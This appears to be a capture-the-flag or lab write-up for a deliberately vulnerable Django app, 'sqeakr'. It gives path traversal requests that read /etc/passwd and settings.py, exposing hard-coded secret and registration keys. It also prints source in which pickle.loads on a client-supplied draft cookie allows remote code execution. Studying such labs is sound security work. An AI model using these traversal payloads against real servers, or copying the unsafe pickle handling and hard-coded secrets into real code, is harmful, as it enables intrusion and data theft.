Skip to content

sqeakr

Summary

  1. Obtain the registration key by reading /home/student/sqeakr/sqeakr/settings.py through the LFI (Local File Inclusion) / path traversal flaw in the avatar preview endpoint.

  2. In /home/student/sqeakr/api/views/sqeakviews.py, the draft cookie is passed straight to Python's pickle.loads, so a crafted cookie yields RCE (remote code execution).

alt text

User-agent: *
Disallow: /api/login
Disallow: /api/register/
Disallow: /api/compose
Disallow: /api/draft
Disallow: /api/profile/update
Disallow: /api/profile/upload
Disallow: /api/profile/preview/*
Disallow: /api/profile/approve/*
Disallow: /api/profile/password
Disallow: /api/avatars/*
Allow: /api/sqeaks
Allow: /feed
# path traversal payloads (plaintext; base64-encode before placing them in the preview URL)
../../../../.././etc/passwd
../../../../../../etc/passwd
../etc/passwd

GET /api/profile/preview/Li4vLi4vLi4vLi4vLi4vLi9ldGMvcGFzc3dk

# list folder content
GET /api/profile/avatars/....//sqeakr/ 

GET /api/profile/avatars/....//....//....//....//home/student/sqeakr/sqeakr/

../../../../.././home/student/sqeakr/sqeakr/settings.py

GET /api/profile/preview/Li4vLi4vLi4vLi4vLi4vLi9ob21lL3N0dWRlbnQvc3FlYWtyL3NxZWFrci9zZXR0aW5ncy5weQ==

alt text

alt text

alt text

alt text

alt text

"""
Django settings for sqeakr project.

Generated by 'django-admin startproject' using Django 2.2.12.

For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""

import os
import environ
# Typed accessor for environment variables: each keyword below declares the
# cast and the default used when the variable is not set.
env = environ.Env(
    # set casting, default value
    PICKLE_EXPECTED_LENGTH=(int, 100),
    DEBUG=(bool, False)
)
# reading .env file
environ.Env.read_env()

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
# Two dirname() calls: this file's directory, then its parent.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the key is hard-coded in source rather than read through
# env(); anyone who can read this file obtains it, so it should be rotated
# and moved to the environment.
SECRET_KEY = 'sz*h2fh58aa65t#efcs5rp6$wb&6!c_n@^(54$-c2yc@8isuzc'

# SECURITY WARNING: don't run with debug turned on in production!
# Read from the environment; falls back to False as declared in env above.
DEBUG = env('DEBUG')

# NOTE(review): '*' accepts any Host header - confirm this is intended
# outside of a lab deployment.
ALLOWED_HOSTS = ['*']


# Application definition

# Django contrib apps followed by the two project apps ('main' and 'api').
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'main',
    'api',
]

# Request/response middleware, applied in the order listed.
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

# Root URL configuration module for the project.
ROOT_URLCONF = 'sqeakr.urls'

# Two template engines share the same "templates" directory.
# NOTE(review): 'sqeakr.custom.Custom' is a project-defined backend listed
# ahead of the stock Django engine; its behaviour is not visible here -
# confirm what it renders and why it must come first.
TEMPLATES = [
    {
        "BACKEND": "sqeakr.custom.Custom",
        "DIRS": [os.path.join(BASE_DIR, "templates")],
        "APP_DIRS": True,
    },
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, "templates")],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

# Dotted path to the WSGI callable used to serve the project.
WSGI_APPLICATION = 'sqeakr.wsgi.application'


# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases

# Single PostgreSQL connection. Every connection parameter is read through
# env(); none of these variables has a default declared on the Env object
# above, so each one must be supplied by the environment or the .env file.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql',
        'NAME': env('DATABASE'),
        'USER': env('DB_USER'),
        'PASSWORD': env('POSTGRES_PASSWORD'),
        'HOST': env('DB_HOST'),
        'PORT': env('DB_PORT'),
    }
}


# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators

# Django's four stock password validators, each with its default options
# (no 'OPTIONS' overrides are given).
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/

# Default language for the project.
LANGUAGE_CODE = 'en-us'

# Default time zone for the project.
TIME_ZONE = 'UTC'

# Translation machinery enabled.
USE_I18N = True

# Locale-aware formatting enabled.
USE_L10N = True

# Timezone-aware datetimes enabled.
USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/

# URL prefix and extra source directory for static assets.
STATIC_URL = '/static/'
STATICFILES_DIRS = [
    os.path.join(BASE_DIR, 'static'),
]

# Media files are exposed under /avatars/ and stored in <BASE_DIR>/avatars.
MEDIA_URL='/avatars/'
MEDIA_ROOT=os.path.join(BASE_DIR, 'avatars')

# Avatar uploads - used in api/views/userviews.py
UPLOAD_DIR = '/tmp/'
# NOTE(review): built from the process's working directory at import time,
# unlike MEDIA_ROOT which is built from BASE_DIR; the two only coincide when
# the server is started from the project root - confirm which is intended.
AVATAR_DIR = os.getcwd() + '/avatars/'

# Registration Key
# NOTE(review): hard-coded secret; anyone who can read this file can
# register. Consider loading it through env() instead.
REGISTRATION_KEY = '58d9ec3c-8588-11ea-af48-acde48001122'
# env was declared with an int cast and a default of 100 for this variable,
# so the int() wrapper here is redundant but harmless.
PICKLE_EXPECTED_LENGTH = int(env('PICKLE_EXPECTED_LENGTH'))
../home/student/sqeakr/api/admin.py
../home/student/sqeakr/api/tokens.py

/home/student/sqeakr/api/admin.py

from django.contrib import admin

# Register your models here.

/home/student/sqeakr/api/tokens.py

import pickle
import pickletools
import base64
import json
from uuid import UUID

from .models import UserProfile
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.core.exceptions import ObjectDoesNotExist

EXPECTED_LENGTH = getattr(settings, 'PICKLE_EXPECTED_LENGTH', 100)
class Tokens():
    """
    Create and validate the auth tokens sent in the 'authtoken' header.

    A token is the base64 text of a pickled dict with the keys 'auth' and
    'userid'. Incoming tokens are screened by is_safe() before they are
    unpickled.

    SECURITY: tokens are unsigned pickles supplied by the client. The
    is_safe() screen only restricts opcode *arguments*; it is not a
    substitute for a signed, data-only format (for example
    django.core.signing or JSON plus an HMAC). Left in place here so that
    already-issued tokens keep working - flagged for replacement.
    """

    # Opcode arguments that is_safe() accepts besides UUIDv4 strings.
    allowedOps = [3, None, 0, 'auth', 1, 'userid', 2, 4, 62]
    # Nominal length of the base64 token text; is_safe() allows +/- 5.
    expected_length = EXPECTED_LENGTH
    # userid carried by guest tokens.
    guest_uuid = '00000000-0000-4000-8000-000000000000'

    @staticmethod
    def create_token(userProfile):
        """Return a base64 token for the given profile (auth=1)."""
        data = {'auth':1,'userid':str(userProfile.userid) }
        p = pickle.dumps(data)
        return base64.b64encode(p).decode('utf-8')

    @staticmethod
    def create_guest_token():
        """Return a base64 token carrying the guest userid (auth=0)."""
        data = {'auth':0,'userid':Tokens.guest_uuid}
        p = pickle.dumps(data)
        return base64.b64encode(p).decode('utf-8')

    @staticmethod
    def _load(token):
        """
        Decode a token into its dict payload.

        Returns the dict, or None when the token fails is_safe(), cannot be
        unpickled, or does not decode to a dict.
        """
        if not Tokens.is_safe(token):
            return None
        try:
            # SECURITY: unpickling client-controlled bytes; see class docstring.
            data = pickle.loads(base64.b64decode(token))
        except Exception:
            # pickle.loads can raise many exception types on malformed
            # input; any of them simply means "not a valid token".
            return None
        # A stream can pass is_safe() yet decode to something other than a
        # dict (e.g. None); callers index by key, so reject those here.
        return data if isinstance(data, dict) else None

    @staticmethod
    def is_guest_token(token):
        """Return True when the token is valid and carries the guest userid."""
        data = Tokens._load(token)
        return data is not None and data.get('userid') == Tokens.guest_uuid

    @staticmethod
    def validate_token(token):
        """
        Resolve a token to its UserProfile.

        Returns the matching UserProfile, or None when the token is
        rejected, has no usable 'userid', or no profile with that userid
        exists.
        """
        data = Tokens._load(token)
        if data is None:
            # log it?
            return None

        _userid = data.get('userid')
        # is_safe() only lets UUIDv4 strings through as free-form values, so
        # anything else here ('auth', an int, None, ...) cannot name a user;
        # reject it before it reaches the database lookup.
        if not Tokens.validate_uuid4(_userid):
            return None

        try:
            return UserProfile.objects.get(userid=_userid)
        except ObjectDoesNotExist:
            return None

    @staticmethod
    def is_safe(token):
        """
        Screen a token before it is unpickled.

        Every opcode argument in the pickle stream must be one of
        allowedOps or a UUIDv4 string, and the token text must be within
        5 characters of expected_length. Returns True or False; never
        raises for malformed input.
        """
        try:
            raw = base64.b64decode(token)
            for _opcode, arg, _pos in pickletools.genops(raw):
                if any(arg == op for op in Tokens.allowedOps):
                    continue
                if not Tokens.validate_uuid4(arg):
                    return False
            token_length = len(token)
        except Exception:
            # bad padding, wrong input type or an unparsable pickle stream
            return False

        lower = Tokens.expected_length - 5
        upper = Tokens.expected_length + 5
        return lower <= token_length <= upper

    @staticmethod
    def validate_uuid4(uuid_string):
        """
        Return True when uuid_string is the text form of a version-4 UUID.

        Non-string values return False instead of raising.
        """
        if not isinstance(uuid_string, str):
            return False
        try:
            val = UUID(uuid_string, version=4)
        except ValueError:
            return False
        # UUID() forces the version bits, so compare against the input to
        # reject strings that were not version 4 to begin with.
        return val.hex == uuid_string.replace('-', '')

/home/student/sqeakr/api/urls.py

from django.urls import path, re_path

from api.views import userviews
from api.views import sqeakviews
from api.views import avatarviews

# Route table for the API app. Patterns are tried top to bottom, so the
# fixed routes are listed before the parameterised ones that would
# otherwise capture them; the bare '<username>' catch-all must stay last.
urlpatterns = [
    path('login', userviews.login, name='login'),
    path('sqeaks', sqeakviews.get_sqeaks, name='get_sqeaks'),
    path('compose', sqeakviews.compose, name='compose'),
    path('register/new', userviews.profile_new, name='profile_new'),
    path('draft', sqeakviews.draft, name='draft'),
    # NOTE(review): the name 'profile' is reused by 'profile/<username>'
    # below, which makes reverse('profile') ambiguous. Left unchanged
    # because callers outside this file may depend on either name.
    path('profile', userviews.profile, name='profile'),
    path('profile/update', userviews.update_user_profile, name='update_profile'),
    path('profile/upload', avatarviews.upload_avatar, name='upload_avatar'),
    path('profile/preview/<img>', avatarviews.preview_avatar, name='preview_avatar'),
    path('profile/approve/<img>', avatarviews.approve_avatar, name='approve_avatar'),
    path('profile/password', userviews.update_password, name='update_password'),
    path('profile/<username>', userviews.get_user_profile, name='profile'),
    path('sqeak/<int:sqeak_id>', sqeakviews.get_sqeak, name='get_sqeak'),
    path('sqeak/<int:sqeak_id>/like', sqeakviews.like_sqeak, name='like_sqeak'),
    # Raw string: '\S' in a normal string literal is an invalid escape
    # sequence. The pattern itself is unchanged. It is unanchored and
    # [\S]+ also matches '/', so 'username' can contain path separators.
    re_path(r'avatars/(?P<username>[\S]+)', avatarviews.get_avatars_for_username, name='get_avatars'),
    path('<username>', sqeakviews.get_sqeaks_by_username, name='sqeaks'),
]

/home/student/sqeakr/api/views/sqeakviews.py

from django.shortcuts import render
from django.http import HttpResponse
from django.http import JsonResponse
from django.core import serializers
from django.contrib.auth.hashers import make_password
from django.core.exceptions import ObjectDoesNotExist
from django.views.decorators.csrf import csrf_exempt
from django.utils import timezone
from ..models import Sqeak, UserProfile, Like 
from ..constants import NOSQEAK, METHOD, MISSING_AUTH
from api.tokens import Tokens
import pickle
import base64
import json


def get_sqeaks(request):
    """
    Endpoint for retrieving all sqeaks, newest first. Supports pagination
    via the 'page' (zero-based, default 0) and 'count' (default 25) query
    parameters.

    Non-numeric paging values fall back to the defaults and negative
    values are clamped to 0. Returns a JSON array of sqeaks; entries liked
    by the authenticated caller (if any) are flagged by process_likes().
    """
    page = 0
    per_page = 25
    try:
        page = int(request.GET.get('page','0'))
        per_page = int(request.GET.get('count','25'))
    except (TypeError, ValueError):
        # Non-numeric input: keep whatever was parsed before the failure.
        pass

    # QuerySets do not support negative indexing, so never let a negative
    # offset or size reach the slice below.
    page = max(page, 0)
    per_page = max(per_page, 0)

    start = page * per_page
    end = start + per_page

    # Slice the lazy QuerySet directly: the database applies the
    # offset/limit instead of every row being loaded just to call len().
    # A slice that runs past the last row simply yields fewer results.
    # (A QuerySet is never None, so the old 404 branch could not trigger.)
    sqlist = Sqeak.objects.all().order_by('-created_date')[start:end]

    _userid = get_userprofile_id(request=request)

    data = [sqeak.json() for sqeak in sqlist]
    data = process_likes(data=data, userid=_userid)

    return JsonResponse(data, safe=False)


def get_sqeak(request, sqeak_id):
    """
    Endpoint returning one sqeak, looked up by primary key.

    GET only (anything else gets a 405). Responds 404 when the lookup
    raises ObjectDoesNotExist. When the caller's token resolves to a
    profile id and that id appears among the sqeak's likes, the payload
    carries is_liked=True.
    """
    if request.method != 'GET':
        return JsonResponse(status=405, data={'status':'error','message':METHOD})

    try:
        viewer_id = get_userprofile_id(request=request)
        payload = Sqeak.objects.get(pk=sqeak_id).json()

        if viewer_id is not None:
            # Compare every like entry, then flag the sqeak if any matched.
            hits = [entry['id'] == viewer_id for entry in payload['likes']]
            if any(hits):
                payload['is_liked'] = True

        return JsonResponse(payload, safe=False)
    except ObjectDoesNotExist:
        return JsonResponse(status=404, data={'status':'error','message':NOSQEAK})

def get_sqeaks_by_username(request, username):
    """
    Endpoint for retrieving all sqeaks owned by the given username, newest
    first. Supports pagination via the 'page' (zero-based, default 0) and
    'count' (default 25) query parameters.

    GET only (anything else gets a 405). Non-numeric paging values fall
    back to the defaults and negative values are clamped to 0. Returns a
    JSON array; entries liked by the authenticated caller (if any) are
    flagged by process_likes().
    """
    if request.method != 'GET':
        return JsonResponse(status=405, data={'status':'error','message':METHOD})

    page = 0
    per_page = 25
    try:
        page = int(request.GET.get('page','0'))
        per_page = int(request.GET.get('count','25'))
    except (TypeError, ValueError):
        # Non-numeric input: keep whatever was parsed before the failure.
        pass

    # QuerySets do not support negative indexing, so never let a negative
    # offset or size reach the slice below.
    page = max(page, 0)
    per_page = max(per_page, 0)

    start = page * per_page
    end = start + per_page

    try:
        sqeaks = Sqeak.objects.filter(owner__username=username)
        sqeaks = sqeaks.order_by('-created_date')

        # Slice the lazy QuerySet directly: the database applies the
        # offset/limit instead of every matching row being loaded just to
        # call len(). A slice past the last row yields fewer results.
        data = [sqeak.json() for sqeak in sqeaks[start:end]]

        _userid = get_userprofile_id(request=request)
        data = process_likes(data=data, userid=_userid)

        return JsonResponse(data, safe=False)
    except ObjectDoesNotExist:
        # filter() itself does not raise this; kept in case a related
        # lookup during serialisation does (not visible from here).
        return JsonResponse(status=404, data={'status':'error','message':NOSQEAK})



@csrf_exempt
def compose(request):
    """
    Endpoint for creating a new sqeak.

    POST only (anything else gets a 405). The caller must send an
    'authtoken' header that resolves to a profile. The text is read from
    the 'sqeak' key of a JSON body, or from the 'sqeak' form field for
    other content types; it is stripped and truncated to 256 characters.
    On success responds 201 and clears the 'draft' cookie.

    A missing token, an unknown profile, or empty/missing/unparsable text
    all yield the 401 MISSING_AUTH response (kept as-is for existing
    clients, although a 400 would describe the last case better).
    """
    if request.method != 'POST':
        return JsonResponse(status=405, data={'status':'error','message':METHOD})

    if 'authtoken' in request.headers:
        _token = request.headers['authtoken']
        _profile = Tokens.validate_token(_token)
        # make sure we have a real user and not a guest
        if _profile is not None:
            _txt = ''
            # get the necessary data
            if request.content_type == 'application/json':
                try:
                    data = json.loads(request.body.decode('utf-8'))
                except ValueError:
                    # Covers both invalid UTF-8 and invalid JSON.
                    data = None
                # Only accept a JSON object whose 'sqeak' value is text.
                if isinstance(data, dict) and isinstance(data.get('sqeak'), str):
                    _txt = data['sqeak'].strip()
            else:
                # Default to '' so a missing field is not a crash.
                _txt = request.POST.get('sqeak', '').strip()

            if _txt:
                _txt = _txt[:256]

                s = Sqeak(sqeak_text=_txt,owner=_profile,created_date=timezone.now())
                s.save()
                res = JsonResponse(status=201, data={'status':'ok','message':'Sqeak created'})
                # delete the draft cookie if it exists
                res.delete_cookie('draft')

                return res

    return JsonResponse(status=401, data={'status':'error','message':MISSING_AUTH})

@csrf_exempt
def draft(request):
    """
    Endpoint for saving and reading back a draft sqeak. The draft lives in
    the client's 'draft' cookie as a base64-encoded pickle.

    Requires an 'authtoken' header that resolves to a profile, otherwise
    responds 401.

    GET  - returns {'status': 'ok', 'sqeak': <decoded cookie>} or {} when
           the cookie is absent or cannot be decoded.
    POST - reads the text from the 'sqeak' key of a JSON body, or from the
           'sqeak' form field for other content types; responds 201 and
           sets the cookie, or 400 when no text was supplied.
    Any other method gets a 405.

    SECURITY: the GET branch unpickles a cookie that the client fully
    controls, which allows arbitrary code execution. The cookie should be
    replaced by a signed, data-only format (for example
    django.core.signing or JSON plus an HMAC). Left in place here because
    changing the cookie format is a behaviour change - flagged for
    replacement.
    """
    if 'authtoken' not in request.headers:
        return JsonResponse(status=401, data={'status':'error','message':MISSING_AUTH})

    _token = request.headers['authtoken']
    _profile = Tokens.validate_token(_token)
    # make sure we have a real user and not a guest
    if _profile is None:
        # Previously this path fell off the end of the view and returned
        # None, which Django turns into a server error.
        return JsonResponse(status=401, data={'status':'error','message':MISSING_AUTH})

    if request.method == 'GET':
        # convert draft pickle and return back the contents
        _c = request.COOKIES.get('draft')
        if _c is None:
            return JsonResponse({})
        try:
            # SECURITY: pickle.loads on untrusted input - see docstring.
            _txt = pickle.loads(base64.b64decode(_c))
            return JsonResponse({'status':'ok','sqeak':_txt})
        except Exception:
            # Undecodable cookie or non-serialisable payload: report
            # "no draft" rather than failing the request.
            return JsonResponse({})

    if request.method == 'POST':
        # create draft pickle and return it
        _txt = ''
        # get the necessary data
        if request.content_type == 'application/json':
            try:
                data = json.loads(request.body.decode('utf-8'))
            except ValueError:
                # Covers both invalid UTF-8 and invalid JSON.
                data = None
            # Only accept a JSON object whose 'sqeak' value is text.
            if isinstance(data, dict) and isinstance(data.get('sqeak'), str):
                _txt = data['sqeak'].strip()
        else:
            # Form-encoded fallback; default to '' so a missing field is
            # not a crash.
            _txt = request.POST.get('sqeak', '').strip()

        if not _txt:
            # Previously this path hit an unbound '_res' and crashed.
            return JsonResponse(status=400, data={'status':'error','message':'Missing sqeak text'})

        _p = pickle.dumps({'draft':_txt})
        _c = base64.b64encode(_p).decode('utf-8')
        _res = JsonResponse(status=201, data={'status':'ok','message':'Draft sqeak created'})
        _res.set_cookie('draft', _c, httponly=True)
        return _res

    return JsonResponse(status=405, data={'status':'error','message':METHOD})

@csrf_exempt
def like_sqeak(request, sqeak_id):
    """
    Toggle the caller's like on the sqeak identified by sqeak_id.

    POST only (anything else gets a 405). The 'authtoken' header must
    resolve to a profile, otherwise the response is 401. If a Like for
    this profile and sqeak already exists its active flag is inverted;
    if none exists, an active one is created. An unknown sqeak gives 404.
    """
    if request.method != 'POST':
        return JsonResponse(status=405, data={'status':'error','message':METHOD})

    # first, get the user
    if 'authtoken' not in request.headers:
        return JsonResponse(status=401, data={'status':'error','message':MISSING_AUTH})

    profile = Tokens.validate_token(request.headers['authtoken'])
    # make sure we have a real user and not a guest
    if profile is None:
        return JsonResponse(status=401, data={'status':'error','message':MISSING_AUTH})

    try:
        target = Sqeak.objects.get(pk=sqeak_id)
        if target is None:
            return JsonResponse(status=404, data={'status':'error','message':NOSQEAK})

        try:
            # existing like: flip its active flag
            existing = Like.objects.get(owner__id=profile.id, sqeak__id=target.id)
            now_active = not existing.active
            existing.active = now_active
            existing.save()
            message = 'Sqeak liked' if now_active else 'Sqeak unliked'
            return JsonResponse(status=200, data={'status':'ok','message':message})
        except ObjectDoesNotExist:
            # no like yet: create an active one
            fresh = Like()
            fresh.owner = profile
            fresh.sqeak = target
            fresh.active = True
            fresh.save()
            return JsonResponse(status=200, data={'status':'ok','message':'Sqeak liked'})
    except ObjectDoesNotExist:
        return JsonResponse(status=404, data={'status':'error','message':NOSQEAK})


def get_userprofile_id(request):
    """
    Resolve the caller's profile id from the request's 'authtoken' header.

    Returns the id of the profile that Tokens.validate_token() yields for
    the header value, or None when the header is absent or no profile is
    returned.
    """
    if 'authtoken' not in request.headers:
        return None

    profile = Tokens.validate_token(request.headers['authtoken'])
    return profile.id if profile is not None else None

def process_likes(data, userid):
    """
    Flag the sqeaks in data that the given user has liked.

    data is a list of sqeak dicts, each with a 'likes' list whose entries
    carry an 'id'. Any sqeak with a like entry whose id equals userid gets
    'is_liked' set to True. The list is modified in place and returned.
    When userid is None nothing is changed.
    """
    if userid is None:
        return data

    for sqeak in data:
        # Compare every like entry, then flag the sqeak if any matched.
        hits = [entry['id'] == userid for entry in sqeak['likes']]
        if any(hits):
            sqeak['is_liked'] = True

    return data